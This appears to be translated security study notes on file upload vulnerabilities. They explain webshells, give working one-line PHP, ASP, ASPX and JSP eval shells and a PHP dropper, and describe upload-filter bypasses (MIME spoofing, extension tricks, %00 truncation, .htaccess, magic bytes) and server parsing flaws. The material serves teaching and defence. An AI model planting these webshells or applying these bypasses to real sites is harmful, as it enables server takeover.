File Upload Vulnerability
1. What is file upload
Encapsulate the client data in the form of a file and send it to the server through the network protocol. The data is parsed on the server side, and finally saved as a real file on the server hard disk.
Usually, when a file is uploaded with the HTTP protocol, a POST request is sent to the web server. After the web server receives the request and agrees, the user will establish a connection with the web server and transmit data.
2. The reason for the vulnerability in file upload
server misconfiguration
File upload restrictions are bypassed and filtering is lax
File Upload Vulnerability in Open Source Editors
File parsing vulnerability leads to file execution
3. File upload vulnerability hazards
Attackers upload malicious files and pass them to the interpreter for execution, and then execute malicious codes on the server, perform malicious operations such as database execution, server file management, and command execution, thereby controlling the entire website and server.
This malicious file is also known as WebShell.
Potentially Vulnerable Locations
Image upload function
Avatar upload function
Document upload function
4.webshell
learn
webshell is a command execution environment in the form of web pages such as asp, jsp, or cgi, and can also be called a web page Trojan horse backdoor.
Attackers can use this webpage backdoor to obtain the operation authority of the website server, control the website server to upload and download files, view the database, execute commands, etc.
back door
There are 65535 ports on a computer. Each port is a door opened by the computer to connect with the outside world. Each door has some services provided by the computer. Attackers use these services to obtain the authority of the server and leave behind a back door.
Classification
-
Classified by file size:
One-sentence Trojan horse: usually only one line of code
Pony: only includes file upload function
Malaysia: Contains many functions, and the code is usually encrypted and hidden
-
Classified by script type
jsp
asp
aspx
php
features
- Most webshells appear in the form of dynamic scripts
- webshell is an asp or php Trojan backdoor
- The webshell can pass through the server firewall, and the data exchanged between the attacker and the controlled server is transmitted through port 80
- Generally, the webshell will not leave records in the system log, but will only leave data transfer records in the web log.
attack process
- Use web vulnerabilities to obtain web permissions
- upload pony
- Upload Malaysia
- Remotely invoke webshell to execute commands
Common webshells
PHP
<?php eval($_GET[pass]);?> <?php eval($_POST[pass]);?>pass is a parameter, which needs to be echoed in the URL after opening the Trojan
http.../?pass = phpinfo(); or system(ipconfig); and other commands
ASP
<%eval request(“pass”)%>
ASPX
<%@ Page Language=“Jscript”%><%eval(Request.Item[“pass”])%>
JSP
<%Runtime.getRuntime().exec(request.getParameter(“i”)));%>
5. The basic principle of webshell
1. Executable script
HTTP packet
2. Data transfer
3. Execute the passed data
direct execution
file contains the implementation
Dynamic function execution
callback function
one word pony
<?php fputs(fopen("up.php","w"),'<?php eval($_POST["cmd"])?>');?>Create an up.php file in the current directory, and the content of the file is PHP code
upload malaysia via pony
Use the base64 tool to convert the PHP code into a string (requires secondary encoding to remove special characters such as +=)
Create up.php, write the file upload PHP code into up.php
<?php fputs(fopen(base64_decode(dXAucGhw),w),base64_decode(base64_decode(PHP code encoding)));?>base64_decode() does decoding processing dXAucGhw is the encoding processing of up.php.
After that, it can be imported into Malaysia through the file upload function.
6. webshell management tool
1. Chinese kitchen knife (caidao) (relatively backward, with a back door)
2.c knife (cknife)
3.Weevely3 (included in kali)
4. Chinese Ant Sword (AntSword)
5. Ice Scorpion (Behinder)
The data transmission will be encrypted, which can bypass the firewall very well.
7. File upload detection method
Client-side JavaScript detection ( detection of file extensions ) (front-end detection)
Server-side MIME type detection ( detection of content-type content )
MIME Reference Manual (w3school.com.cn)
Server-side directory path detection ( detection of content related to the root path parameter )
Server-side file extension detection ( detection of content related to file extension )
Server-side file content detection ( check whether the content is legal, whether it contains malicious code, etc. )
8. Bypass method
Use the burpsuite tool to capture packets, and then modify the file to meet the server detection form.
Bypass client-side detection (front-end JavaScript detection)
Principle of client detection:
Usually, the upload page contains JavaScript code that specifically detects file uploads, and the most common one is to detect whether the file type and extension are legal.
method:
Just disable JS in the local browser client.
It can be realized by using the NoScript plug-in of Firefox browser, disabling JS in IE, etc.
Bypass server detection
Principle of server detection:
Server-side code typically checks for three points:
MIME type, file suffix, file content
[External link image transfer failed, the source site may have an anti-leeching mechanism, it is recommended to save the image and upload it directly (img-afZHgJBZ-1677413271759) (C:\Users\wrz\AppData\Roaming\Typora\typora-user-images\ image-20230226183230079.png)]
File magic number : The first few bytes in the file can identify what type of file the file is.
The magic number of the file format File Format and Magic Number
Use the WinHex tool to view the magic number of the corresponding file.
Bypass method:
1. Bypass MIME type detection
principle:
Detect the value of the Content-Type field of the http packet during the upload process of image type files to determine whether the uploaded file is legal.
method:
Use burpsuite to intercept and modify the content-type type of the packet file to bypass.
2. Bypass file suffix detection - blacklist
Principle (blacklist strategy):
File extensions are illegal in the blacklist. Generally, there is a special blacklist, which contains common dangerous script files.
method:
-
Suffix Case Bypass (.pHp)
In the judgment of the suffix, if you only compare the strings separately to judge whether it is a restricted file, you can use the case of the suffix name to bypass.
-
Space bypass (.php)
If the blacklist does not empty the suffix name
It can be bypassed by adding a space after the suffix name.
-
dot bypass (.php.)
If the blacklist does not de-dot the suffix name
Using the file name feature of the Windows system, the last dot of the suffix will be automatically removed, and the file name suffix can be bypassed by adding a dot.
-
::$DATA bypass
If the blacklist is not done go::$DATA processing
Using a feature of the NTFS file system under Windows, you can add ::$DATA after the suffix name to bypass the blacklist detection.
Windows will automatically filter ::$DATA.
-
Cooperate with Apache to resolve vulnerabilities
Apache parsing has a feature:
The parsing file is judged from right to left, and if the parsing is unrecognizable, then judge to the left.
Such as aa.php.owf.rar file, Apache does not recognize and parse rar and owf, it will be parsed into php file.
-
.htaccess file (distributed configuration file)
Cooperate with list bypass, upload a custom .htaccess, you can easily bypass various detections.
The .htaccess file is called Hypertext Access (Hypertext Access).
Provides methods for changing the configuration for a directory.
When the file is uploaded to the server, the server will find the .htaccess file to read and parse the configuration.
This configuration can be customized to make files bypass detection.
3. Bypass file suffix detection - white list
Principle (whitelist strategy):
File extensions that are not in the whitelist are illegal.
Bypass method:
The server judges the file type from the back to the front, and parses the file from the front to the back.
It can be bypassed by 00 truncation, including %00 truncation and 0X00 truncation.
Example: Upload a file named aa.php%00.png
The server judges the file type from the back to the front. When the server reads %00, it will parse it into 0X00. When there is 0X00, it will automatically ignore the content after 0X00.
Then this file will be uploaded as a png file, bypassing the whitelist.
When the server saves the file, it parses from front to back, automatically ignores .png, and saves it as a php file.
Note :
In the url, it becomes aa.php%00.png. In the file extension, %00 needs to be decoded and then added to the file extension.
Use the burpsuite tool to add, first add a space where %00 needs to be added, and then check the HEX position, the HEX of the space is 20, change this position to 00, which is the decoding of %00.
4. Bypass file content detection
principle:
Generally, it is judged whether the uploaded file is legal by detecting the content of the file.
Two detection methods:
By detecting the file magic number.
Call the API or function to load test the file. The common one is image rendering test (maybe secondary rendering test).
Bypass method:
- Bypass file magic number detection
Add the corresponding file magic number at the beginning of the file.
For example: to bypass the magic number detection of jpg files, add FF D8 FF E0 10 4A 46 49 46
- Bypass file loading detection
Render/Load Test Attacks - Code Injection Bypass
Attack principle:
Find a blank space to fill in the code without destroying the rendering of the file itself
Generally, it is the comment area of the picture, which can ensure the integrity of the file structure.
Attack method on secondary rendering ----- attack file loader itself
Attack principle:
Attack the file loader through an overflow attack,
After uploading malicious files, the file loader on the server will actively test, and the overflow attack executes shellcode during the loading test.
9. Web parsing vulnerability
Apache Parsing Vulnerability
The parsing file is judged from right to left, and if the parsing is unrecognizable, then judge to the left.
Such as aa.php.owf.rar file, Apache does not recognize and parse rar and owf, it will be parsed into php file.
IIS6.0 parsing vulnerability
1. Directory analysis
Form: www.xxx.com/xx.asp/xx.jpg
Principle : The server will parse all the files in the .asp directory into asp files by default.
2. File analysis
Format: www.xxx.com/xx.asp;.jpg
Principle : The server does not parse the content after the semicolon by default, so xx.asp;jpg is parsed into an asp file
IIS7.0 parsing vulnerability
Format: any file name/any file name.php
**Principle: **IIS7.0/7.5 has a parsing vulnerability similar to Nginx when parsing php.
For any file name, as long as the string "/any file name.php" is appended after the URL, it will be parsed in the way of PHP
Nginx parsing vulnerability
Form 1: Arbitrary file name/arbitrary file name.php
**Principle:**Add "/any file name.php" to any file name and it will be parsed according to php, such as test.jpg/x.php
Form 2: Any file name%00.php
For the lower version of Nginx, %00.php can be added after any file name for parsing attack
(Nginx version <=0.8.37)